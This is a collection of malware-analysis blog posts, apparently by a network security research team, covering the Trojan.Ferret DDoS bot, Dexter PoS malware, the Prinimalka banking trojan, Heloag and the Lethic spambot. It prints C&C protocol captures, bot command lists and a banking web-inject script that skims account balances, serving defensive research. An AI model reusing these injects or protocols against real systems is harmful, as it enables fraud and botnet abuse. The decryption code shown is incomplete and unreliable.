A Business of Ferrets

By: Dennis Schwarz -

Trojan.Ferret appeared on my radar thanks to a tweet by @malpush. The tweet revealed a URL that at the time of this writing was pointing to a command and control (C&C) panel that looked like this:


The logo alone convinced me to study this business of ferrets further. Coincidentally (for Arbor), it turns out that this malware is a DDoS bot.

Malware Sample

The sample analyzed can be found at malwr (MD5: 4fa91b76294d849d01655ffb72b30981).

It is written in Delphi and plays the following malware games: UPX packing, string obfuscation, anti-virtual machine, anti-debugging, self-modifying code, and process hollowing.

Based on the Delphi usage and the language used for part of the panel, this bot is likely of Russian origin.


Trojan.Ferret uses two methods of obfuscation; both are a combination of base64 and XOR. Different keys are used for various sections. The first obfuscation method is used mostly for strings and can be decrypted with the following Python function:

def decrypt_strings(msg, key):
  msg_no_b64 = base64.b64decode(msg)

  plain_buf = []
  for i in range(len(msg_no_b64)):
    key_lsb = ord(key[i % len(key)]) & 0xf
    msg_lsb = ord(msg_no_b64[i]) & 0xf

    c = msg_lsb ^ key_lsb
    d = c ^ 0xa

    msg_slsb = ord(msg_no_b64[i]) & 0xf0
    plain_byte = msg_slsb ^ d


  return "".join(plain_buf)

Here are some examples:

>>> decrypt_strings("QG1wZ2xnPj4sZGNk", "12xc3qwfhjeryTTYHH")

>>> decrypt_strings("TG12RGZveGBnSG5mZ2JrQg==", "12xc3qwfhjeryTTYHH")

>>> decrypt_strings("dWpkbXFqZmxi", "mu#X")

>>> decrypt_strings("cn9tY3Nqf2d1", "mu#X")

>>> decrypt_strings("ZXN8djotITgyOyQ0MD4mOD45Jzc5I2NmfS1kaXhzdCx+YXo=", "GMrlZ8t3pypO3423423LpFqCUx")

The second method is used mostly for C&C communications and can be cleaned up with the following Python function:

def decrypt_cnc(msg, key):
  msg_no_b64 = base64.b64decode(msg)

  plain_buf = []
  for offset, enc_byte in enumerate(msg_no_b64):
    plain_byte = ord(enc_byte) ^ ord(key[offset % len(key)])

  return "".join(plain_buf)

Here are some examples:

>>> decrypt_cnc("ChYJCRhta3k=", "x38")
'2.11 USA'

>>> decrypt_cnc("DRhAAA4YeRgIXBgIUBgPVRgKAEs=", "x38")
'5 x86 A 0d 0h 7m 28s'

Command and Control

C&C is HTTP based. Two message types have been identified. The first is message type 0 or the “phone home” and looks like:

POST /hor/input.php HTTP/1.0
User-Agent: Mozilla Gecko Firefox 25
Accept: text/plain
Accept-Encoding: identity
Accept-Language: en-EN,en
Connection: Close
Referer: http://mhome.br
Content-Length: 106
Content-Type: application/x-www-form-urlencoded


Here’s what it looks like decrypted:

m=0&h=18803769021711750776216376939&p=HOME&v=2.11 USA&s=5 x86 A 0d 0h 7m 28s

Its POST parameters are:

  • m – Message type (0)
  • h – Hash based on computer name
  • p – Computer name
  • v – Version and locale
  • s – Windows version, architecture, user type, and uptime

The phone home response looks like:

HTTP/1.1 200 OK
Date: Wed, 04 Dec 2013 14:48:27 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
Content-Length: 32
Connection: close
Content-Type: text/html; charset=UTF-8


Decrypted, it is the User-Agent used in the request:

>>> decrypt_cnc("dVdCUVRUWRh/XVtTVxh+UUpdXldAGAoN", "x38")
'Mozilla Gecko Firefox 25'

The second message type is 1 or “poll for commands”. It looks like:

POST /hor/input.php HTTP/1.0
User-Agent: Mozilla Gecko Firefox 25
Accept: text/plain
Accept-Encoding: identity
Accept-Language: en-EN,en
Connection: Close
Referer: http://udot.tk
Content-Length: 49
Content-Type: application/x-www-form-urlencoded


And here it is decrypted:


Its POST parameters are:

  • m – Message type (1)
  • h – Hash based on computer name

An example poll response is:

HTTP/1.1 200 OK
Date: Wed, 04 Dec 2013 12:56:16 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
Content-Length: 72
Connection: close
Content-Type: text/html; charset=UTF-8



>>> decrypt_cnc("UExMSF5UV1dcElBMTEgCFxdMWUpfXUwWVl1MF1FWXF1AFkhQSBcSAAgSCQ0IEgg=", "x38")

Commands are delimited by “*”s and are formatted like:



The following bot commands have been identified:

  • httpflood – HTTP GET flood
  • httppost – HTTP POST flood
  • udpflood – UDP flood
  • synflood – TCP connect flood
  • tcpflood – TCP flood
  • download – download and execute (all bots)
  • downloadone – download and execute (specified bot)
  • update – update (all bots)
  • updateos – update (specified OS)
  • updateone – update (specified bot)
  • updatever – update (specified version)
  • removeos – remove bot (specified OS)
  • removeone – remove bot (specified bot)
  • s! – stop all floods
  • su – stop UDP flood
  • sh – stop HTTP flood
  • ss – stop TCP SYN flood
  • st – stop TCP flood

More information about each command can be found in the “Task Management” section of the C&C panel:



Note: I didn’t see any references to the “memexec” or “script” commands in the analyzed binary.

C&C Panel

Wrapping up, here is a behind the scenes tour of the C&C panel; the “Statistic/Index” page:


Here is the “Uploads” page:


And, part of the “Bot List” page:



This post has analyzed the crypto, C&C infrastructure, and command set of Trojan.Ferret—a new DDoS bot that is likely of Russian origin.  At the time of this writing only a handful of unique samples and C&C servers have been identified, so the scope and impact of the new threat is still uncertain. ASERT will continue to track this business of ferrets, and any other new businesses that arise.

Happy Holidays: Point of Sale Malware Campaigns Targeting Credit and Debit Cards

By: cwilson -

Inside Recent Point-of-Sale Malware Campaign Activities

Curt Wilson, Dave Loftus, Matt Bing

An active Point of Sale (PoS) compromise campaign designed to steal credit and debit card data using the Dexter and Project Hook malware has been detected. Indicators of compromise will be provided for mitigation and detection purposes. Prior to the publication of this Threat Intelligence document (embedded at the end of this post), members of the FS-ISAC, major Credit Card vendors and law enforcement were notified.

It appears that there are at least three distinct versions of Dexter:

  1. Stardust (looks to be an older version, perhaps version 1)
  2. Millenium (note spelling)
  3. Revelation (two observed malware samples; has the capability to use FTP to exfiltrate data)

In early November 2013, ASERT researchers discovered two servers hosting Dexter and other POS malware to include Project Hook.  The Dexter campaign looks more active, especially in the Eastern Hemisphere and therefore shall be the main focus herein. Dexter, first documented by Seculert in December 2012, is a Windows-based malware used to steal credit card data from PoS systems. The exact method of compromise is not currently known, however PoS systems suffer from the same security challenges that any other Windows-based deployment does. Network and host-based vulnerabilities (such as default or weak credentials accessible over Remote Desktop and open wireless networks that include a PoS machine), misuse, social engineering and physical access are likely candidates for infection. Additionally, potential brittleness and obvious criticality of PoS systems may be a factor in the reportedly slow patch deployment process on PoS machines, which increases risk. Smaller businesses are likely an easier target due to reduced security. While the attackers may receive less card data from smaller retailers, infections may be more numerous and last longer due to the lack of security reporting and security staff in such environments.

Figure 1: Dexter (Purple) and Project Hook (Orange) infections in the Eastern Hemisphere

Dexter and Project Hook infections in the eastern hemisphere

Figure 2: Dexter (Purple) and Project Hook (Orange) infections in the western hemisphere

Screen Shot 2013-12-03 at 1.22.00 AM

For the full document to include a list of various compromise indicators and information about the back-end infrastructure, please download the full public report -

Dexter and Project Hook Break the Bank


Trojan.Prinimalka: Bits and Pieces

By: Dennis Schwarz -

Trojan.Prinimalka is a banking trojan associated with an attack campaign that received quite a bit of press in October 2012. “Project Blitzkrieg” is “a new cybecriminal [sic] project aimed at recruiting 100 botmasters to help launch a series of lucrative online heists targeting 30 U.S. banks. The Trojan installs a proxy on the victim host and then sends system/web browser details back to the C&C. The botmasters can use this setup to “spoof” banking requests as the unsuspecting banking user.

Trojan.Prinimalka is based on Gozi and shares quite a few similarities. There are at least 2 variants in the wild: “nah” and “gov”. This analysis focuses on the “gov” version. Static analysis was performed on a memory dump of a sample (MD5: 2bdb44e5e3bbcebf3f0ceb156a407794). It was supplemented with some dynamic analysis using C&Cs located at 193.xxx.92.xxx (as of writing, still live) and

Registry Persistence
A value named “govShell” is created under the “HKEY_CURRENT_USERSOFTWAREMicrosoftWindowsCurrentVersionRun” key. It stores “%UserProfile%govXXXX.exe”–the “X”s are random lowercase letters. This is a standard registry persistence technique where the program will run on user login.

A mutex named “sdfsdfsdfsdfsfsdfsdfsdfsdfsdf” is created.

Dropped Files

  • %UserProfile%govXXXX.exe–the “X”s are random lowercase letters
  • %UserProfile%govtemp1.exe
  • %UserProfile%govold.exe
  • %UserProfile%govcookies.txt
  • %CD%govcookies.dat

Registry Configuration
Under the “HKEY_CURRENT_USERSOFTWAREMicrosoftWindowsCurrentVersion” key, various configuration values with a “gov” prefix are maintained.

Registry Value Description Sample
govid Randomly generated 10 digit identifier 33520xxxxx
govoptions Obfuscated configuration file NEWOPTS<obfuscated data>
govopt_server1 Primary C&C address
govopt_reserv Secondary C&C address
govopt_forms Relative C&C URL to POST System/Web Browser cloning info to /system/prinimalka.py/forms
govopt_options Relative C&C URL to GET configuration data /system/prinimalka.py/options
govopt_command Relative C&C URL to GET command data /system/prinimalka.py/command
govopt_file Relative C&C URL for unknown data /system/prinimalka.py/cookies (looks unused in this sample)
govopt_ss Relative C&C URL for unknown data /cgi-bin/trash.py (looks unused in this sample)
govopt_pstorage Relative C&C URL for unknown data /cgi-bin/trash.py (looks unused in this sample)
govopt_certs Relative C&C URL for unknown data /cgi-bin/trash.py (looks unused in this sample)
govopt_idproject Version 081003
govopt_pauseopt Poll time 3200
govcontrol_crc CRC 34661b26
govbalance Controls reverse connection to C&C Ok

“cmd.exe” is bound to “” on a random port. The bindshell is used in conjunction with the Type 2 “TELN” command.

A basic proxy is bound to “” on a random port—bindshell’s random port minus 1.  The proxy is used in conjunction with the Type 2 “SCKS” command. RSA indicates that the C&C backend has the ability to make web requests to banking websites via the infected host.

C&C Command Channel, Type 1
A Type 1 command request looks like this.

GET /system/prinimalka.py/command?user_id=33520xxxxx&version_id=022201&crc=00000000 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)Host:

The returned command grammar has the following format.


command1 <parameter>rn

command2 <parameter>rn

commandN <parameter>rn




HTTP/1.1 200 OK

Date: Wed, 17 Oct 2012 13:00:02 GMT

Server: Apache/2.2.22 (Fedora)

Content-Length: 39

Connection: close

Content-Type: text/plain; charset=UTF-8




changepause 900

Here are the identified commands.

Command Description
deleteself Delete binary and registry persistence
download Download to and execute “%UserProfile%govtemp1.exe”
update Copy current version to “%UserProfile%govold.exe” and download new version
killwin Overwrite first 4 bytes of “.PHYSICALDRIVE0” then shutdown
changeversion Update “govopt_idproject“ registry value
changehost Update “govopt_server1” registry value; primary C&C
changereserv Update “govopt_reserv” registry value; secondary C&C
changepause Update “govopt_pauseopt” registry value
enable_backconnect Set “govbalance” registry value to “ok”. Enables reverse connection to C&C for Type 2 command channel
send_cookies Dump browser cookies via “ExportCookieFile()” into “%UserProfile%govcookies.txt” then POST to C&C
recv_cookies Download browser cookies from C&C into “%CD%govcookies.dat” then imports them via “ImportCookieFile()”
enable_rdp Doesn’t look to be implemented in this sample.

C&C Command Channel, Type 2

The Type 2 command channel is a reverse connection from the victim host back to the C&C. It is enabled by the Type 1 “enable_backconnect” command. There isn’t much of a format, the victim host reads 4 bytes from the socket and checks them against the following identified commands.

Command Description
ping Respond to C&C with “pong”
NEED Ask C&C for any Type 1 commands
RDP0 Doesn’t look to be implemented in this sample.
SCKS Connects to the proxy running on localhost and relays traffic (to bypass NAT/firewall)
TELN Connects to the bindshell running on localhost and relays traffic (to bypass NAT/firewall)

There is an 81 byte obfuscated configuration file stored in the binary. It is copied to the “govoptions” registry value. Using corkami’s aplib compression library, the obfuscation can be cleaned up.

>>> import aplib>>> govoptions =’NEWOPTSx001x01rep_sizxdbx87xacx04wxf8bxa4x0c@0pzoWtr{xf9x0bv}b>crx1cptx1c x1b3yx83wx0ex02.go<xdfl;xbbcxb8m*Gx0bxe0Hxc5x0eyux1btx02x00x00′>>> s, len = aplib.decompress(govoptions[8:]).do()

>>> s.split(“x00″)

['1rep_size', '1', '1web_size', '0', '1post_size', '0', '1ss_size', '0', '1vbscript', ' ', '3rep', 'www.google.com', 'Google', 'Hooyugle', '', '', '']

Here are the identified configuration verbs.

Verb Description
1rep_size Number of 3rep sections
1web_size Number of 4webvalue sections
1post_size Number of 3postvalue sections
1ss_size Number of 2ss sections
1vbscript Currently unknown
3rep Define a find and replace rule
4webvalue Looks to be unused in this sample
3postvalue Looks to be unused in this sample
2ss Looks to be unused in this sample

An updated, obfuscated configuration file can be requested from the C&C like this.

GET /system/prinimalka.py/options?user_id=33520xxxxx&version_id=022201&crc=34661b26&uptime=00:00:00:59&port=5641&ip= HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)Host: 193.xxx.92.xxx

The “3rep” sections of the configuration file define “find and replace” rules. These are used with the web browser function-hooking feature to secretly add code to banking websites. At the time of writing, 34 bank URLs are being targeted:

  • -investing.schwab.com/trading/start
  • -www.schwab.com
  • bankofamerica.com/accounts-overview/accounts-overview.go
  • chaseonline.chase.com/MyAccounts.aspx
  • client.schwab.com/Accounts/Summary/Summary
  • etrade.com/e/t/accounts/accountscombo
  • fidelity.com/ftgw/fbc/ofsummary/defaultPage
  • ibanking-services.com/cib/CEBMainServlet/AccountOverview
  • investing.schwab.com/secure/schwab/
  • investor.firstrade.com/firstrade/mainmenu.do
  • myaccountsaws.navyfcu.org/nfoaa/main
  • online.citibank.com/US/JPS/portal/Home.do
  • online.wamu.com/Servicing/Servicing.aspx?targetPage=AccountSummary
  • online.wellsfargo.com/das/cgi-bin/session.cgi
  • onlineaccess.ncsecu.org/accounts/balances.aspx
  • onlinebanking.capitalone.com/CapitalOne/Accounts/
  • onlinebanking.huntington.com/Accounts/Accounts.asp
  • onlinebanking.mandtbank.com/summary/AccountSummary.aspx
  • onlinebanking.pnc.com/alservlet/
  • onlinebanking.tdbank.com/accts/getAccts.asp?fname=
  • secure.accurint.com
  • securebank.regions.com/balances/AccountSummary.aspx
  • sharebuilder.com/sharebuilder/Home.aspx
  • suntrust.com/portal/server.pt
  • trading.scottrade.com/home/default.aspx
  • us.hsbc.com/1/2/
  • usaa.com/inet/ent_home/CpHome
  • usbank.com/internetBanking/RequestRouter
  • wachovia.com/MyAccounts.aspx
  • www.53.com/servlet/efsonline/index.html
  • www.americanfunds.com/account/account-summary.htm
  • www.optionsxpress.com/
  • www.paypal.com/us/cgi-bin/webscr
  • wwws.ameritrade.com/cgi-bin/apps/u/Home

A sample find and replace rule looks like this.

>>> config[10]’3rep’>>> config[11] # URL’fidelity.com/ftgw/fbc/ofsummary/defaultPage’

>>> config[12] # Find


>>> for line in config[13].split(“rn”): # Replace

…     print line


<div style=”visibility: hidden”>

<iframe name=”myframe” id=”myframe”></iframe>

<form name=xbalance method=’POST’ action=’/robots.txt’ target=myframe><input name=balance><input name=from><input name=lastlogin value=”0″></form>

</div><script language=”JavaScript”>

var data = document.body.innerHTML;

var reg = /Portfolio Total:[dD]{1,128}($[d,.]+)/gmi;

var arr = reg.exec(data);

if (arr) {

var postdata = arr[1];

var f = document.xbalance;

f.from.value = “fidelity”;

f.balance.value = postdata;




As can be seen, code is added to the end of the page to POST balance, bank name, and last login information to “/robots.txt”. The “/robots.txt” is used as a tag, see below.

Process Injection and Function Hooking

The Trojan injects part of itself into all running processes except for those with an image name starting with:

  • svchost.exe
  • [System Process]
  • System
  • smss.exe
  • winlogon.exe
  • lsass.exe
  • avp
  • csrss.exe
  • services.exe

The injected function is responsible for hooking the following functions.

kernel32.dll advapi32.dll wininet.dll nspr4.dll
CreateProcessA RegEnumValueA InternetCloseHandle PR_Write
CreateProcessW RegEnumValueW InternetQueryDataAvailable PR_Read
FindFirstFileA InternetReadFile PR_Close
FindFirstFileW InternetReadFileExA
FindNextFileA HttpSendRequestA
FindNextFileW HttpSendRequestW

The CreateProcess hooks make sure any new processes are injected.

The FindXFile hooks hide any files that start with “gov”.

The RegEnumValue hooks hide any registry values that start with “gov”.

The InternetReadFile and PR_Read hooks are used to rewrite pieces of returned banking websites based on the “3rep” rules in the configuration file.

The HttpSendRequest and PR_Write functions look for the “/robots.txt” tag introduced by the “3rep” rewrite rules.  They then POST the HTTP request and cookie file to the C&C.

System/Web Browser Cloning

RSA indicates that the C&C backend has the ability to clone a victim’s web browser while sending requests through the victim host’s proxy. The following shows the type of data the trojan gathers for this feature.

POST /system/prinimalka.py/forms HTTP/1.1Content-Type: multipart/form-data; boundary=————————–15c5175b07b5User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)Host:

Content-Length: 705

Connection: Keep-Alive

Cache-Control: no-cache


Content-Disposition: form-data; name=”upload_file”; filename=”33520xxxxx.022201″

Content-Type: application/octet-stream

URL: http://service.stat/

priv=USER_PRIV_ADMIN&winver=Microsoft Windows XP Professional Service Pack 3 (Build 2600) 2600.xpsp.080413-2111&resolution=1024×768&UniqueID={0X8X9XFX-FXDX-4X1X-8X6X-7X0X1XDX2XDX}&NTProductId=7X4X7-OEM-2X5X6X2-X4X6X&ProductId=7X4X7-OEM-0X5X1X3-X8X4X&IEProductId=7X4X7-OEM-0X5X1X3-X8X4X&TimeZone=Pacific Standard Time&UserAgent=Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)


Arbor Networks at Virus Bulletin 2011

By: jedwards -

Arbor’s ASERT team has a paper at this year’s Virus Bulletin conference in Barcelona, Spain. The paper, by Arbor’s Jeff Edwards and Jose Nazario, is titled A survey of Chinese DDoS malware and is based on some of the detailed analysis we did as part of the development of the ATLAS intelligence feed or AIF. Our malware stream contains a lot of DDoS bots, many from China, one of the more interesting ecosystems of malware development.

The abstract follows:

This paper surveys the diverse landscape of Trojan horse families populating a specific niche in the overall malware ecosystem: botnets that primarily serve as Distributed Denial of Service (DDoS) attack agents and which are believed to be of Chinese origin and/or to be primarily controlled from Chinese IP space.

Approximately two dozen distinct malware families will be described and documented, including the Rincux, NetBot Attacker, IMDDOS, Darkshell and YoyoDDoS families. These families will be characterized in terms of their command and control (CnC) protocols, DDoS attack capabilities, general code architecture, organization of their CnC infrastructure, and preferred targets.

Findings regarding the evolution and sharing/cross-pollination of malcode, as well as the build/release frequency of new versions will be presented. An approximate taxonomy of this particular space of malware will be proposed. The bulk malware analysis infrastructure that was used to obtain these findings will also be briefly described.

The paper is quite in-depth and contains a lot of technical details not covered in the talk, so be sure to refer to the paper if the talk is at all interesting.

Trojan.Heloag Downloader Analysis

By: Jose -

Trojan.Heloag is a Trojan horse designed to manage the installation of other malware on the infected PC. This malcode gives complete control to the attacker and enables them to install arbitrary malcode on the PC. This one appeared in our zoo recently and after reading in an AV writeup about a possible DDoS capability within it, we investigated. Upon detailed inspection, this bot does not appear to have any DDoS capabilities built into it, it appears to only manage downloads on the infected PC.

Many of the samples analyzed were downloaded from 7zsm.com or elwm.net. The malware may download additional files from those domains. We do not know how big this botnet is, but we do see a handful of users in the wild.

Once launched, the malware will install itself in the WINDOWS directory. Names we have observed include:

  • C:WINDOWScsrse.exe
  • C:WINDOWSThunderUpdate.exe
  • C:WINDOWSconme.exe

The malware then installs a registry key to ensure that it starts when the user logs on:

HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogon = [filename]

Where [filename] refers to the installed filename from above.

It then makes a connection to the C&C server for the botnet, often on TCP port 8090, to register itself and await commands. Traffic is usually preceded by a single byte to indicate the message purpose:

  • 01 – initial hello
  • 02 – keep alive, idle message
  • 03 – download the named file
  • 04 – connect to other peers
  • 05 – send hostname to server
  • 06 – clear
  • 07 – close connection

An initial “HELLO” would therefore look like this:


where HOSTNAME is the Windows name of the computer. We often see a bot connect and get download commands for new EXEs to load onto the PC.

Trojan.Heloag infected hosts often download other malcode over HTTP from a central server, and can also connect to other bots over TCP, often using ports 7000-7010. It’s unclear what the purpose of this is, but it appears to be some form of peer-to-peer

Antivirus uses a handful of aliases for these samples. They aren’t consistent, which isn’t surprising, and the data on this downloader is very thin, as well. AV names we’ve seen include:

  • Microsoft - Backdoor:Win32/Heloag.A
  • Symantec - Suspicious.Insight
  • F-Secure - Suspicious:W32/Malware!Gemini
  • McAfee - Trojan.Crypt.XPACK.Gen
  • Trend Mircro - PAK_Generic.001

We are tracking a handful of these controllers around the Internet, around a few dozen or so.

Lethic Spambot Analysis: Pills, Watches, and Diplomas

By: Jose -

There’s another spambot afoot, and of its activities is to spam pharmacy and pill spam. We found it via the malcode in our zoo and the C&C traffic that we hadn’t characterized previously. AV coverage of the samples is modest. The botnet appears to be spamming the usual unwanted junk, and appears to be a medium sized botnet.

Malcode Details

Once launched, the malcode installs itself as:


It then makes the registry changes to ensure it always runs at startup:

HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogon "" = C:WINDOWSsystem32ldfrmmd.exe
HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun "" = C:WINDOWSsystem32ldfrmmd.exe

And it creates a mutex with what appears to be a semi-random name, e.g. adrerdbbbddeil12 (also seen: jjwsmmmwinasllp2, dsdsduehsgser533, etc).

Newer versions appear to try and avoid or kill common analysis tools:

Find Window - Class Name () Window Name (The Wireshark Network Analyzer)
Find Window - Class Name () Window Name (Process Monitor - Sysinternals: www.sysinternals.com)
Find Window - Class Name () Window Name (File Monitor - Sysinternals: www.sysinternals.com)
Find Window - Class Name () Window Name (Registry Monitor - Sysinternals: www.sysinternals.com)

Here’s an example of what appears to be the C&C:

Host Name IP Address
Destination: happymanwoman.cn port 8900/TCP

And the communications data:

$0000 | 00 00 00 00 06 | .....
$0000 | 00 00 00 00 06 | .....
$0000 | 6E 33 0F 00 01 D1 55 D2 54 00 19 | n3....U.T..
$0000 | 6E 33 0F 00 21 01 | n3..!.
$0000 | 6E 33 0F 00 03 4C 00 34 32 31 20 34 2E 34 2E 35 | n3...L.421 4.4.5
$0010 | 20 53 65 72 76 65 72 20 62 75 73 79 2C 20 74 72 | Server busy, tr
$0020 | 79 20 61 67 61 69 6E 20 6C 61 74 65 72 2E 20 28 | y again later. (
$0030 | 6D 78 2E 67 6F 6F 67 6C 65 2E 63 6F 6D 29 20 31 | mx.google.com) 1
$0040 | 36 73 69 31 32 38 37 32 30 33 79 78 65 2E 31 32 | 6si1287203yxe.12
$0050 | 38 0D 0A | 8..
$0000 | 6E 33 0F 00 13 01 | n3....
$0000 | 6E 33 0F 00 02 | n3...
$0010 | 6E 33 0F 00 02 6F 33 0F 00 01 C3 82 84 31 00 19 | n3...o3......1..
$0000 | 6F 33 0F 00 21 01 | o3..!.
$0000 | 70 33 0F 00 01 C3 32 6A 8F 00 19 | p3....2j...
$0000 | 70 33 0F 00 21 01 | p3..!.
$0000 | 6F 33 0F 00 03 38 00 32 32 30 20 6E 61 70 6F 6 | o3...8.220 napol
$0010 | 65 6F 6E 2E 74 65 6C 65 6E 65 74 2D 6F 70 73 2E | eon.telenet-ops.
$0020 | 62 65 20 62 69 7A 73 6D 74 70 20 45 53 4D 54 50 | be bizsmtp ESMTP
$0030 | 20 73 65 72 76 65 72 20 72 65 61 64 79 0D 0A | server ready..
$0000 | 70 33 0F 00 03 39 00 32 32 30 20 6D 74 61 38 33 | p3...9.220 mta83
$0010 | 34 2E 6D 61 69 6C 2E 75 6B 6C 2E 79 61 68 6F 6F | 4.mail.ukl.yahoo
$0020 | 2E 63 6F 6D 20 45 53 4D 54 50 20 59 53 6D 74 70 | .com ESMTP YSmtp
$0040 | 20 73 65 72 76 69 63 65 20 72 65 61 64 79 0D 0A | service ready..

After this C&C communications bit it starts to spam on TCP port 25 using fairly standard SMTP dialogues.

Apparent C&C hostnames and TCP ports used:


For those who want to check their own zoos for samples, here they are by by date acquired and their MD5 hash:


And origins by MD5 (all of which had been referenced by downloaders we analyzed):


We have several other EXE URLs on those malcode distribution sites in the past 90 days.

Botnet details and spamming behavior

This graphic shows the relationships of these servers to each-other and their supporting infrastructure, such as their host networks and name servers.


Here’s some of the info about the C&C hostnames, including registrars and ASN info:

-------------[ busnotstop.com
30058 | | FDCSERVERS - FDCservers.net
multi.surbl.org sa-blacklist and other sources
uri.ca2.sophosxl.com Reactively blacklisted
-------------[ goodhearme.cn
30058 | | FDCSERVERS - FDCservers.net
Sponsoring Registrar: 北京新网互联科技有限公司
-------------[ happymanwoman.cn
30058 | | FDCSERVERS - FDCservers.net
Sponsoring Registrar: 北京新网数码信息技术有限公司
-------------[ iamnothere.cn
20473 | | AS-CHOOPA - Choopa, LLC
Sponsoring Registrar: 北京新网互联科技有限公司
-------------[ itsyourservice.cn
30058 | | FDCSERVERS - FDCservers.net
Sponsoring Registrar: 北京新网数码信息技术有限公司
-------------[ linktomem.cn
30058 | | FDCSERVERS - FDCservers.net
Sponsoring Registrar: 北京新网数码信息技术有限公司
-------------[ somethingwrong.cn
30058 | | FDCSERVERS - FDCservers.net
Sponsoring Registrar: 北京新网互联科技有限公司
-------------[ sometimesgood.com
30058 | | FDCSERVERS - FDCservers.net
multi.surbl.org sa-blacklist and other sources
uri.ca2.sophosxl.com Reactively blacklisted
-------------[ tenverybest.com
30058 | | FDCSERVERS - FDCservers.net
multi.surbl.org sa-blacklist and other sources
uri.ca2.sophosxl.com Reactively blacklisted
-------------[ verywellhere.cn
30058 | | FDCSERVERS - FDCservers.net
Sponsoring Registrar: 易名中国
-------------[ wasyoujoy.cn
33642 | | CPCTECHNOLOGIES-LLC - CPC Technologies, LLC.
Sponsoring Registrar: 北京万网志成科技有限公司
-------------[ younotgood.cn
33642 | | CPCTECHNOLOGIES-LLC - CPC Technologies, LLC.
Sponsoring Registrar: 北京新网互联科技有限公司

The minimal blacklist listings were as of yesterday.

When we analyze our spamtrap data, we see 694 distinct spamming zombies for this botnet (based on an observed spam template for “CheapViagra”) in the past day and a half. We know, based on some external measurements, that this is only a small fraction of the botnet. Just four unique subjects in this time that mention “CheapViagra”:

_Buy CheapViagra? $1.05/100mg. Pay 20 Times Less $ Online.. 100%
CheapViagra? Just $1/100mg if Order Online. Cheapest Price - Highest
Order CheapViagra Online,
Spam:Order CheapViagra Online, NoPrescription. Name-BrandViagra.

In at least one of the mails, the link in the message was pointing to wapanyf.cn, which is live and redirects to www.medz-sales.com. Here’s some DNS blacklist data on that from yesterday:

-- Thu Dec 3 21:22:53 2009 GMT
==> Checking wapanyf.cn
multi.surbl.org Blacklisted
uri.ca2.sophosxl.com Reactively blacklisted
dnsbl.mailshell.net Blacklisted
==> Checking wapanyf.cn (
zen.spamhaus.org Direct UBE sources, verified spam services and ROKSO spammers
b.barracudacentral.org Listed

And whois information on that domain:

Domain Name: wapanyf.cn
ROID: 20091106s10001s97618457-cn
Domain Status: clientDeleteProhibited
Domain Status: clientTransferProhibited
Registrant Organization: é˙√ä¿¡ä¿¡
Registrant Name: é˙√ä¿¡ä¿¡
Administrative Email: changshegnjia@126.com
Sponsoring Registrar: æˇ å·ıå¤§ç˝…å∫å…¡ç∏Œç»˛æ˛≈é˙∆å¬å∂¸
Name Server:ns3.knewblock.com
Name Server:ns6.6gl.ru
Name Server:ns4.knewblock.com
Name Server:ns2.painteager.com
Name Server:ns1.painteager.com
Name Server:ns5.6gl.ru
Registration Date: 2009-11-06 23:12
Expiration Date: 2010-11-06 23:12

The final resting place of the pills spam:

-- Thu Dec 3 21:24:03 2009 GMT
==> Checking medz-sales.com
multi.surbl.org sa-blacklist and other sources
==> Checking medz-sales.com (
zen.spamhaus.org Direct UBE sources, verified spam services and ROKSO spammers
b.barracudacentral.org Listed

And whois information on that domain:

Whois Server: whois.namerich.cn
Referral URL: http://www.namerich.cn
Name Server: NS5.JF5.RU
Name Server: NS6.JF5.RU
Status: clientDeleteProhibited
Status: clientTransferProhibited
Updated Date: 03-dec-2009
Creation Date: 18-nov-2009
Expiration Date: 18-nov-2010

Here’s all of the URLs we’ve seen advertised in this “CheapViagra” campaign based on our spamtrap analysis from the past 36 hours:








































Lethic bots have also been seen spamming diploma spam, watch spam, and the like. Here’s a few example subject lines from this botnet:

Subject: 0nline Pharmacy, Save on Medications from a safe and reliable canadian 0nline Pharmacy qnq kfi
Subject: Valued customer smeg_69dd@ops-netman.net 80% OFF on Pfizer.
Subject: Valued customer smeg_69d@ops-netman.net 80% OFF on Pfizer.
Subject: Great Popular Soft At Prices You Will Like.
Subject: Need Good Software? Ask Us For Help.
Subject: Extenze Ma1eEnhancement. PenisEn1argement Pills that work! Try it Risk Free.. 100% Guaranteeed uearej t7o
Subject: jRo1exRep1ica Watches & more, browse our collection of perfect rep1icaWatches: jRo1exCartier, Breitling, Omega & many more. ljhlzq 98
Subject: only $200 for SwissRo1ex, Breitling, Chanel, Cartier, Corum, IWC, Hublot, Omega, DeWitt, LouisVuiton, Panerai, Patek Philippe & .. zsyl vzzu
Subject: Get a diploma for a better job.


Lethic is yet another spambot to join the fray. It is unclear what its future holds, and we do not know when it emerged. However this shows how “full” the “ecosystem” for spambots is. Lethic’s complexity is minimal when compared to other spam botnets (no rootkit seen, etc) but it appears effective enough at this time.

July 2009 Malicious Links: 14 Hotspots

By: Jose -

Inspired by a friend’s question of which CIDRs to block first, I went looking into our malicious URL database for July, 2009, data and dug for the top IPs and netblocks. This was pretty easy: what URLs did the malware we analyze go to, what were the IP addresses associated, and then process that list with “aguri” to discover trends and hot spots. Some of the results are malicious and run by abusers, some are abused networks that are run by otherwise responsible network admins. I’ve tried to describe what we’ve found in each of them and note that none of them are the next “McColo” or “RBN”, just the loving locations that malware phones home to.

The list below shows the IP or narrow CIDR blocks we found that popped out, together with the contributions (raw number of observations and percentage of overall activity seen for the month). 263 (1.09%)

Located in AS3356 (Level 3 Communications). Appears to be related to MSN hosting. Often contacted by what appear to be a lot of games and executables of dubious repute. We get a lot of Trojan horse programs in here, no surprise they piggyback on otherwise healthy networks. 661 (2.73%/2.73%)

